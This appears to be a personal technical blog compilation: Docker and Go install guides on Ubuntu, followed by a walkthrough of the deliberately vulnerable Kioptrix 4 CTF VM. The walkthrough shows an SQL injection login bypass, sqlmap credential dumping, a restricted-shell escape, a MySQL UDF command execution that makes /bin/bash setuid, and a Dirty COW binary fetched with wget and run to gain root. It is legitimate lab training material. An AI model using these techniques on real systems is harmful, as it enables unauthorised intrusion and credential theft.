Install Docker on Linux (Ubuntu 20.04 LTS)

Docker provides the ability to package and run an application in a loosely isolated environment called a container. The isolation and security allow you to run many containers simultaneously on a given host. Containers are lightweight because they don’t need the extra load of a hypervisor, but run directly within the host machine’s kernel.

Docker installation steps :

  • First update the system
sudo apt update  
  • Install prerequisite packages which let apt use packages over HTTPS
sudo apt install apt-transport-https \
    ca-certificates curl \
    software-properties-common  
  • Add Docker's official GPG key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \
    sudo apt-key add -  
  • Add the docker repository
sudo add-apt-repository \
    "deb [arch=amd64] \
    https://download.docker.com/linux/ubuntu focal stable"  
  • Update the package index with the newly added repository
sudo apt update  
  • Now install the Docker engine
sudo apt-get install docker-ce docker-ce-cli containerd.io
  • Check that the docker daemon is running and enabled on startup (the Ubuntu package enables it automatically)
sudo systemctl status docker  

The output should show the service as active (running).


  • Testing the docker engine
sudo docker run hello-world

Output :

Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
0e03bdcc26d7: Pull complete
Digest: sha256:e7c70bb24b462baa86c102610182e3efcb12a04854e8c582838d92970a09f323
Status: Downloaded newer image for hello-world:latest

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    (amd64)
 3. The Docker daemon created a new container from that image which runs the
    executable that produces the output you are currently reading.
 4. The Docker daemon streamed that output to the Docker client, which sent it
    to your terminal.

To try something more ambitious, you can run an Ubuntu container with:
 $ docker run -it ubuntu bash

Share images, automate workflows, and more with a free Docker ID:
 https://hub.docker.com/

For more examples and ideas, visit:
 https://docs.docker.com/get-started/

This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.

Running the docker command without sudo :

  • First, add your user to the docker group
sudo usermod -aG docker ${USER}
  • Now, to apply the change, log in to the user again and confirm that the user is in the docker group :
su - ${USER}
id -nG

That's it. Now log out and log back in, then run the command below

docker run hello-world
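As an added example (not from the original post), the same repository setup as the steps above, but with the signing key pinned by its published fingerprint and stored in a dedicated keyring instead of being piped unverified into apt-key. Ubuntu 20.04 (focal) on amd64 is assumed, as in the steps; the fingerprint is the one Docker publishes in its install documentation.

```shell
#!/bin/sh
# Added example, not part of the original post: Docker repo setup with the
# signing key verified against its published fingerprint before it is trusted.
# Assumes Ubuntu (codename read from /etc/os-release), curl, gpg and sudo.

# Fingerprint Docker publishes for its apt signing key.
DOCKER_KEY_FPR="9DC858229FC7DD38854AE2D88D81803C0EBFCD88"

# Normalise a fingerprint for comparison: drop spaces, upper-case the hex.
norm_fpr() {
  printf '%s' "$1" | tr -d ' ' | tr 'a-f' 'A-F'
}

# Return 0 if the fingerprint matches Docker's published one, 1 otherwise.
fpr_matches() {
  [ "$(norm_fpr "$1")" = "$DOCKER_KEY_FPR" ]
}

# Build the apt source line for a codename/arch. signed-by= ties the repo to
# one keyring file rather than the global apt-key trust store.
docker_apt_source() {
  codename="$1"; arch="${2:-amd64}"
  printf 'deb [arch=%s signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu %s stable\n' \
    "$arch" "$codename"
}

# Fetch the key, verify it, install key and repo, refresh apt.
# Needs network and sudo, so it is only defined here, not run at load time.
install_docker_repo() {
  codename="$(. /etc/os-release && echo "$VERSION_CODENAME")"
  tmp="$(mktemp)"
  curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o "$tmp"
  # --with-colons prints "fpr:::::::::<FINGERPRINT>:"; field 10 is the fingerprint.
  got="$(gpg --show-keys --with-colons "$tmp" | awk -F: '/^fpr/ {print $10; exit}')"
  if ! fpr_matches "$got"; then
    echo "Docker key fingerprint mismatch: got $got" >&2
    rm -f "$tmp"
    return 1
  fi
  sudo install -d -m 0755 /etc/apt/keyrings
  gpg --dearmor < "$tmp" | sudo tee /etc/apt/keyrings/docker.gpg > /dev/null
  rm -f "$tmp"
  docker_apt_source "$codename" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
  sudo apt update
}
```

`install_docker_repo` replaces the curl | apt-key and add-apt-repository steps; the rest of the install (apt install docker-ce docker-ce-cli containerd.io) is unchanged. On the docker-group step that follows: a member of the docker group can start a container that mounts the host filesystem, so that membership is equivalent to root on the host and should be granted as deliberately as sudo.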

Install GO in UNIX/LINUX Environment

Go is a statically typed, compiled programming language designed at Google by Robert Griesemer, Rob Pike, and Ken Thompson. Follow the steps below to install it on your Linux/Unix box :

  1. Download it from https://golang.org/dl/
$ curl -sSL https://golang.org/dl/goX.XX.X.linux-amd64.tar.gz -o goX.XX.X.linux-amd64.tar.gz

Replace X.XX.X with the current version.

  2. Extract the downloaded archive to /usr/local
$ sudo tar -C /usr/local -xzf goX.XX.X.linux-amd64.tar.gz
  3. Add /usr/local/go/bin to your PATH. To do that, append the lines below to the .bashrc file in your home directory (~/.bashrc) :
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

And now you are good to GO {he he !!}. Test the setup with go version :

$ go version  
go version go1.15.3 linux/amd64

That's it.
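As an added example, not part of the original post, the same download and extraction with the tarball's SHA-256 checked against the checksum published next to it on https://golang.org/dl/ before anything is unpacked into /usr/local. The version and checksum passed to `install_go` are placeholders to be copied from the download page.

```shell
#!/bin/sh
# Added example, not part of the original post: install a Go release only
# after its SHA-256 matches the checksum published on the download page.

# Tarball name for a version and platform, e.g. go1.15.3.linux-amd64.tar.gz
go_tarball() {
  printf 'go%s.%s-%s.tar.gz' "$1" "${2:-linux}" "${3:-amd64}"
}

# Return 0 if the file's SHA-256 equals the expected digest (case-insensitive).
verify_sha256() {
  file="$1"
  expected="$(printf '%s' "$2" | tr 'A-F' 'a-f')"
  actual="$(sha256sum "$file" | cut -d' ' -f1)"
  [ "$actual" = "$expected" ]
}

# Full flow: fetch, verify, extract, print the PATH lines.
# Needs network and sudo; $1 = version (e.g. 1.15.3), $2 = checksum from the
# download page. Defined here, not run at load time.
install_go() {
  version="$1"; expected="$2"
  tarball="$(go_tarball "$version")"
  curl -sSL "https://golang.org/dl/$tarball" -o "$tarball"
  if ! verify_sha256 "$tarball" "$expected"; then
    echo "checksum mismatch for $tarball, refusing to extract" >&2
    rm -f "$tarball"
    return 1
  fi
  # Extracting over an old tree leaves stale files from the previous version,
  # so remove any existing install first.
  sudo rm -rf /usr/local/go
  sudo tar -C /usr/local -xzf "$tarball"
  cat <<'EOF'
Add to ~/.bashrc:
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
EOF
}
```

Only the two helpers run without network; `install_go 1.15.3 <checksum from the download page>` does the actual fetch and refuses to extract on a mismatch.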



Kioptrix: Level 1.3 (#4) CTF VM WalkThrough

VM : Kioptrix Level 1.3 (#4)

Download link : https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar

VM HOST : VMware Workstation/Player
Network : Bridged mode with DHCP

Scanning the network to identify the running VM :
 $ nmap -sP 192.168.1.0/24 

Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-15 08:12 UTC
Nmap scan report for _gateway (192.168.1.1)
Host is up (0.0028s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.6
Host is up (0.076s latency).
Nmap scan report for 192.168.1.8
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.12
Host is up (0.010s latency).
Nmap scan report for avm (192.168.1.14)
Host is up (0.00067s latency).
Nmap scan report for 192.168.1.15
Host is up (0.075s latency).
Nmap scan report for 192.168.1.100
Host is up (0.0024s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 3.03 seconds
Target VM IP : 192.168.1.15

Scanning Target :
 $ nmap -A -Pn 192.168.1.15 -oN nmap.scan
 
 # Nmap 7.60 scan initiated Fri May 15 08:22:12 2020 as: nmap -A -Pn -oN nmap.scan 192.168.1.15
 Nmap scan report for 192.168.1.15
 Host is up (0.017s latency).
 Not shown: 566 closed ports, 430 filtered ports
 PORT    STATE SERVICE     VERSION
 22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
 | ssh-hostkey:
 |   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
 |_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
 80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
 |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 |_http-title: Site doesn't have a title (text/html).
 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 |_clock-skew: mean: -24d02h55m48s, deviation: 0s, median: -24d02h55m48s
 |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb-os-discovery:
 |   OS: Unix (Samba 3.0.28a)
 |   Computer name: Kioptrix4
 |   NetBIOS computer name:
 |   Domain name: localdomain
 |   FQDN: Kioptrix4.localdomain
 |_  System time: 2020-04-21T01:28:29-04:00
 | smb-security-mode:
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 |_smb2-time: Protocol negotiation failed (SMB2)
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Fri May 15 08:24:19 2020 -- 1 IP address (1 host up) scanned in 127.09 seconds
Findings : Apache web server is running on port 80, OpenSSH on port 22


Scanning web server with dirb
 $ dirb http://192.168.1.15 | tee dirb.sacn
 
 -----------------
 DIRB v2.22
 By The Dark Raver
 -----------------
 
 START_TIME: Fri May 15 08:40:56 2020
 URL_BASE: http://192.168.1.15/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612
 
 ---- Scanning URL: http://192.168.1.15/ ----
 + http://192.168.1.15/cgi-bin/ (CODE:403|SIZE:327)                                                      
 ==> DIRECTORY: http://192.168.1.15/images/                                                              
 + http://192.168.1.15/index (CODE:200|SIZE:1255)                                                        
 + http://192.168.1.15/index.php (CODE:200|SIZE:1255)                                                    
 ==> DIRECTORY: http://192.168.1.15/john/                                                                
 + http://192.168.1.15/logout (CODE:302|SIZE:0)                                                          
 + http://192.168.1.15/member (CODE:302|SIZE:220)                                                        
 + http://192.168.1.15/server-status (CODE:403|SIZE:332)                                                 
 
 
 ---- Entering directory: http://192.168.1.15/images/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 
 ---- Entering directory: http://192.168.1.15/john/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 -----------------
 END_TIME: Fri May 15 08:41:15 2020
Nikto Scan :
 $ nikto -host 192.168.1.15 | tee nikto.scan
 - Nikto v2.1.5
 ---------------------------------------------------------------------------
 + Target IP:          192.168.1.15
 + Target Hostname:    192.168.1.15
 + Target Port:        80
 + Start Time:         2020-05-15 08:44:06 (GMT0)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
 + The anti-clickjacking X-Frame-Options header is not present.
 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
 + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3268: /icons/: Directory indexing found.
 + OSVDB-3268: /images/: Directory indexing found.
 + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
 + Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
 + OSVDB-3233: /icons/README: Apache default file found.
 + Cookie PHPSESSID created without the httponly flag
 + 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
 + End Time:           2020-05-15 08:44:46 (GMT0) (40 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
Enumeration with enum4linux :
 $ enum4linux.pl 192.168.1.15 | tee enum4linx.scan
 WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.        
 WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.        
 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 09:35:46 2020
 
 
  ==========================                                                                             
 |    Target Information    |                                                                            
  ==========================                                                                             
 Target ........... 192.168.1.15                                                                         
 RID Range ........ 500-550,1000-1050                                                                    
 Username ......... ''                                                                                   
 Password ......... ''                                                                                   
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 ...............
 ...............
 S-1-22-1-1001 Unix User\john (Local User)
 S-1-22-1-1002 Unix User\robert (Local User)
 
  =============================================
 |    Getting printer info for 192.168.1.15    |
  =============================================
 mkdir failed on directory /var/run/samba/msg.lock: Permission denied
 No printers returned.
 enum4linux complete on Fri May 15 09:37:03 2020
Filtering the user account information from the above scan
 $ cat enum4linx.scan | grep Account
 index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody    Desc: (null)
 index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert   Name: ,,,       Desc: (null)
 index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root     Name: root      Desc: (null)
 index: 0x4 RID: 0xbba acb: 0x00000010 Account: john     Name: ,,,       Desc: (null)
 index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret       Name: loneferret,,,     Desc: (null)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)
Users found : robert, root, john, loneferret

Scan with dirsearch :
 $ dirsearch.py -u http://192.168.1.15 -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
 
  _|. _ _  _  _  _ _|_    v0.3.
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                          
 Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8679                                                                                                     
 Error Log: /home/ajay/tools/dirsearch/logs/errors-20-05-15_08-47-32.log                                                                                                                                         
 Target: http://192.168.1.15                                                                                                                                                                                     
 [08:47:32] Starting:
 [08:47:38] 403 -  323B  - /.hta
 [08:47:38] 403 -  330B  - /.ht_wsr.txt
 .....
 .....
 [08:49:57] 302 -  220B  - /member/login.html  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.jar  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.sql  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.py  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.rb  ->  index.php
 [08:49:57] 302 -  220B  - /member/logon  ->  index.php
 [08:49:57] 302 -  220B  - /member/signin  ->  index.php
 [08:50:31] 403 -  333B  - /server-status/
 [08:50:31] 403 -  332B  - /server-status
 
 Task Completed
Filtering the output
 $ cat dirsearchReport | grep 200
 
 200   109B   http://192.168.1.15:80/checklogin.php
 200   109B   http://192.168.1.15:80/checklogin
 200   298B   http://192.168.1.15:80/database.sql
 200     1KB  http://192.168.1.15:80/index
 200     1KB  http://192.168.1.15:80/index.php
 200     1KB  http://192.168.1.15:80/index.php/login/
There is a database.sql on the server containing the credentials `john/1234`


The above creds do not work on the Member Login page.

SQL Vulnerability : By fuzzing the inputs of the Member Login page, we find an SQL injection in the login password field. With the username `john` and the password payload `' or 1='1 --+`, the user is logged in and the credentials john/MyNameIsJohn are shown.

Using sqlmap to dump all the data from the database :
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit"
 
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dbs
 
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 [*] information_schema
 [*] members
 [*] mysql
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --tables -D members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 Database: members
 [1 table]
 +---------+                                                                                             
 | members |
 +---------+
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --columns -D members -T members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 Database: members
 Table: members
 [3 columns]
 +----------+-------------+                                                                              
 | Column   | Type        |
 +----------+-------------+                                                                              
 | id       | int(4)      |
 | password | varchar(65) |
 | username | varchar(65) |
 +----------+-------------+
 
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dump -D members -T members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 [16:12:12] [INFO] retrieved: 1
 [16:12:13] [INFO] retrieved: MyNameIsJohn
 [16:12:25] [INFO] retrieved: john
 [16:12:29] [INFO] retrieved: 2
 [16:12:30] [INFO] retrieved: ADGAdsafdfwt4gadfga==
 [16:12:48] [INFO] retrieved: robert
 Database: members
 Table: members
 [2 entries]
 +----+----------+-----------------------+
 | id | username | password              |
 +----+----------+-----------------------+
 | 1  | john     | MyNameIsJohn          |
 | 2  | robert   | ADGAdsafdfwt4gadfga== |
 +----+----------+-----------------------+
The creds are :

john: MyNameIsJohn
robert:ADGAdsafdfwt4gadfga==

With the above creds we can get access to the SSH server, which gives us a restricted shell.
 $ ssh john@192.168.1.15
 john@192.168.1.15's password:
 Welcome to LigGoat Security Systems - We are Watching
 == Welcome LigGoat Employee ==
 LigGoat Shell is in place so you  don't screw up
 Type '?' or 'help' to get the list of allowed commands
 john:~$
 john:~$ help
 cd  clear  echo  exit  help  ll  lpath  ls
 
In this shell we can run only a limited set of commands; anything else gives an error message
 john:~$ ls -al
 total 28
 drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
 drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
 -rw------- 1 john john 1133 2020-04-21 01:08 .bash_history
 -rw-r--r-- 1 john john  220 2012-02-04 18:04 .bash_logout
 -rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
 -rw-r--r-- 1 john john 3105 2020-04-21 01:08 .lhistory
 -rw-r--r-- 1 john john  586 2012-02-04 18:04 .profile
 john:~$ pwd
 *** unknown command: pwd
 john:~$ cat /etc/passwd
 *** unknown command: cat
And if we violate the rules, it kicks us out of the shell
 john:~$ cd ..
 *** forbidden path -> "/home/"
 *** You have 0 warning(s) left, before getting kicked out.
 This incident has been reported.
 john:~$ cd ..
 *** forbidden path -> "/home/"
 *** Kicked out
 Connection to 192.168.1.15 closed.
You can read more about restricted shell here : https://www.ibm.com/support/pages/how-use-restricted-shell

Breaking out of the restricted shell :

I tried all the methods from the posts listed below, but nothing worked in this case.

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
https://www.metahackers.pro/breakout-of-restricted-shell/
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

But when giving random inputs, I get this error for the input `echo $)`
 john:~$ echo $)
 /bin/sh: Syntax error: ")" unexpected
 Traceback (most recent call last):
   File "/bin/kshell", line 27, in <module>
     lshell.main()
   File "/usr/lib/python2.5/site-packages/lshell.py", line 1219, in main
     cli.cmdloop()
   File "/usr/lib/python2.5/site-packages/lshell.py", line 410, in cmdloop
     stop = self.onecmd(line)
   File "/usr/lib/python2.5/site-packages/lshell.py", line 531, in onecmd
     func = getattr(self, 'do_' + cmd)
   File "/usr/lib/python2.5/site-packages/lshell.py", line 134, in __getattr__
     if self.check_path(self.g_line) == 1:
   File "/usr/lib/python2.5/site-packages/lshell.py", line 327, in check_path
     item = cout.readlines()[0].split(' ')[0].strip()
 IndexError: list index out of range
 Connection to 192.168.1.15 closed.
This looks like a Python error message, so the shell is probably a Python script (or is running inside a Python interpreter). If that is the case, let's try to run a shell inside it
 john:~$ os.system("/bin/sh")
 *** unknown command: os.system("/bin/sh")
 john:~$
It shows an error, but prefixing the same call with any allowed command gives an unrestricted shell
 john:~$ ls os.system("/bin/bash")
 bash-3.2$
 bash-3.2$ pwd
 /home/john
 bash-3.2$
Now try to get a root shell
 bash-3.2$ whoami
 john
 bash-3.2$ sudo su
 [sudo] password for john:
 john is not in the sudoers file.  This incident will be reported.
 bash-3.2$
But john is not on the sudoers list.

Privilege Escalation : 

Enumerating the system :

Enumerating the Operating system and kernel version :
 bash-3.2$ cat /etc/issue
 Welcome to LigGoat Security Server
 
 bash-3.2$ cat /etc/lsb-release
 DISTRIB_ID=Ubuntu
 DISTRIB_RELEASE=8.04
 DISTRIB_CODENAME=hardy
 DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
 
 bash-3.2$ uname -a
 Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Enumerating files with the sticky, SGID and SUID permission bits :
 // sticky bit permissions
 $ find / -perm -1000 -type d 2>/dev/null
 /var/spool/samba
 /var/spool/cron/atjobs
 /var/spool/cron/atspool
 /var/spool/cron/crontabs
 /var/lib/php5
 /var/lib/samba/usershares
 /var/tmp
 /var/lock
 /dev/shm
 /tmp
 
 // SGID permission
 $ find / -perm -g=s -type f 2>/dev/null
 /usr/bin/wall
 /usr/bin/expiry
 /usr/bin/crontab
 /usr/bin/bsd-write
 /usr/bin/mlocate
 /usr/bin/at
 /usr/bin/chage
 /usr/bin/ssh-agent
 /usr/sbin/uuidd
 /sbin/unix_chkpwd
 
 // SUID permission
 $ find / -perm -u=s -type f 2>/dev/null
 /usr/lib/apache2/suexec
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/openssh/ssh-keysign
 /usr/lib/pt_chown
 /usr/bin/chsh
 /usr/bin/sudo
 /usr/bin/traceroute6.iputils
 /usr/bin/newgrp
 /usr/bin/sudoedit
 /usr/bin/chfn
 /usr/bin/arping
 /usr/bin/gpasswd
 /usr/bin/mtr
 /usr/bin/passwd
 /usr/bin/at
 /usr/sbin/pppd
 /usr/sbin/uuidd
 /lib/dhcp3-client/call-dhclient-script
 /bin/mount
 /bin/ping6
 /bin/fusermount
 /bin/su
 /bin/ping
 /bin/umount
 /bin/bash
 /sbin/umount.cifs
 /sbin/mount.cifs
Nothing interesting is found here; if binaries like vim or nmap were listed, they could be used to escalate privileges.

Searching for applications and services running with root privileges :
 bash-3.2$ ps aux | grep root
 
 root      4623  0.0  0.0   1716   488 tty5     Ss+  14:20   0:00 /sbin/getty 38400 tty5
 root      4627  0.0  0.0   1716   488 tty2     Ss+  14:20   0:00 /sbin/getty 38400 tty2
 root      4629  0.0  0.0   1716   484 tty3     Ss+  14:20   0:00 /sbin/getty 38400 tty3
 root      4632  0.0  0.0   1716   488 tty6     Ss+  14:20   0:00 /sbin/getty 38400 tty6
 root      4690  0.0  0.0   1872   544 ?        S    14:20   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/km
 root      4711  0.0  0.0   5316   984 ?        Ss   14:20   0:00 /usr/sbin/sshd
 root      4767  0.0  0.0   1772   524 ?        S    14:20   0:00 /bin/sh /usr/bin/mysqld_safe
 root      4809  0.0  1.5 126988 16232 ?        Sl   14:20   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/
 root      4811  0.0  0.0   1700   556 ?        S    14:20   0:00 logger -p daemon.err -t mysqld_safe -i -t mysql
 root      4884  0.0  0.1   6528  1328 ?        Ss   14:20   0:00 /usr/sbin/nmbd -D
As we can see, mysqld is running with root privileges, and by enumerating the web root directory we can get the creds to log in to mysql
 bash-3.2$ cd /var/www
 bash-3.2$ ls
 checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
 bash-3.2$ cat checklogin.php | head -n15
 <?php
 ob_start();
 $host="localhost"; // Host name
 $username="root"; // Mysql username
 $password=""; // Mysql password
 $db_name="members"; // Database name
 $tbl_name="members"; // Table name
 
 // Connect to server and select databse.
 mysql_connect("$host", "$username", "$password")or die("cannot connect");
 mysql_select_db("$db_name")or die("cannot select DB");
 
 // Define $myusername and $mypassword
 $myusername=$_POST['myusername'];
 $mypassword=$_POST['mypassword'];
 bash-3.2$
As we can see, the username is `root` and the password is blank. Now try to log in to mysql with them
 bash-3.2$ mysql -u root -p
 Enter password:
 Welcome to the MySQL monitor.  Commands end with ; or \g.
 Your MySQL connection id is 7
 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
 Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
 mysql> show databases;
 +--------------------+
 | Database           |
 +--------------------+
 | information_schema |
 | members            |
 | mysql              |
 +--------------------+
 3 rows in set (0.00 sec)
 
 mysql>

Method 1 :

The mysql daemon, running with root privileges, can be used to get a root shell
 mysql> use mysql;
 mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
 mysql> select sys_exec('chmod u+s /bin/bash');
 mysql> quit
Now back in the shell
 bash-3.2$ ls -al /bin/bash
 -rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
 bash-3.2$ bash -p
 bash-3.2# whoami
 root
 bash-3.2# cd /root
 bash-3.2# ls
 congrats.txt  lshell-0.9.12
 bash-3.2# cat congrats.txt
 Congratulations!
 You've got root.
 
 There is more then one way to get root on this system. Try and find them.
 I've only tested two (2) methods, but it doesn't mean there aren't more.
 As always there's an easy way, and a not so easy way to pop this box.
 Look for other methods to get root privileges other than running an exploit.
 
 It took a while to make this. For one it's not as easy as it may look, and
 also work and family life are my priorities. Hobbies are low on my list.
 Really hope you enjoyed this one.
 
 If you haven't already, check out the other VMs available on:
 www.kioptrix.com
 
 Thanks for playing,
 loneferret
For a more detailed explanation of the above method, see : https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux
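As an added example from the defender's side (not part of the original walkthrough), the SUID/SGID enumeration above turned into a baseline check: the list is recorded when the host is built and compared later, so a file that has gained the setuid bit since then, such as /bin/bash after Method 1's `chmod u+s /bin/bash`, shows up immediately. The path lists used below are constructed sample data.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: a baseline check for
# set-id files. Method 1 above leaves /bin/bash setuid root; diffing the
# current list against a baseline taken at build time catches that.

# List SUID and SGID regular files below a root (default /), sorted, one per line.
# Same predicates as the enumeration above (-perm -u=s / -perm -g=s);
# -xdev stays on one filesystem so /proc and mounts are skipped.
list_setid_files() {
  find "${1:-/}" -xdev -type f \( -perm -u=s -o -perm -g=s \) 2>/dev/null | sort
}

# Print paths present in the current list ($2) but absent from the baseline ($1).
# Both files hold one path per line; comm needs sorted input, so sort copies first.
new_setid_files() {
  b="$(mktemp)"; c="$(mktemp)"
  sort "$1" > "$b"
  sort "$2" > "$c"
  comm -13 "$b" "$c"      # -13: drop lines only in baseline and lines in both
  rm -f "$b" "$c"
}

# Compare two saved lists; print any new set-id files and return 1 if there are any.
audit_setid_lists() {
  new="$(new_setid_files "$1" "$2")"
  if [ -n "$new" ]; then
    echo "set-id files not in baseline:"
    printf '%s\n' "$new"
    return 1
  fi
  echo "no new set-id files"
  return 0
}

# Live use (not run at load time, it walks the whole filesystem):
#   list_setid_files / > /var/lib/setid.baseline     # once, on a known-good host
#   list_setid_files / > /tmp/setid.now && audit_setid_lists /var/lib/setid.baseline /tmp/setid.now
```

The baseline must be stored where the users being watched cannot edit it, otherwise an attacker who has already gained root simply adds /bin/bash to it.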

Method 2 :

The kernel version is 2.6.24, so the Dirty COW kernel exploit can be used to escalate privileges.

Exploit link :  https://www.exploit-db.com/exploits/40839

The above exploit creates a new user 'firefart' with root privileges. Also note that the Kioptrix 1.4 VM does not have a gcc compiler, so compile the binary on a 32-bit architecture, download it onto the VM and then execute it. Compilation of the binary :
 $ gcc -pthread exploit.c -o exploit -lcrypt
Now download it onto the VM and run it.
 bash-3.2$ cd /tmp
 bash-3.2$ wget http://192.168.1.8:8000/dirty_cow
 bash-3.2$ ./dirty_cow
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password:
 Complete line:
 firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
 
 mmap: b7f0e000
 madvise 0
 
 ptrace 0
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
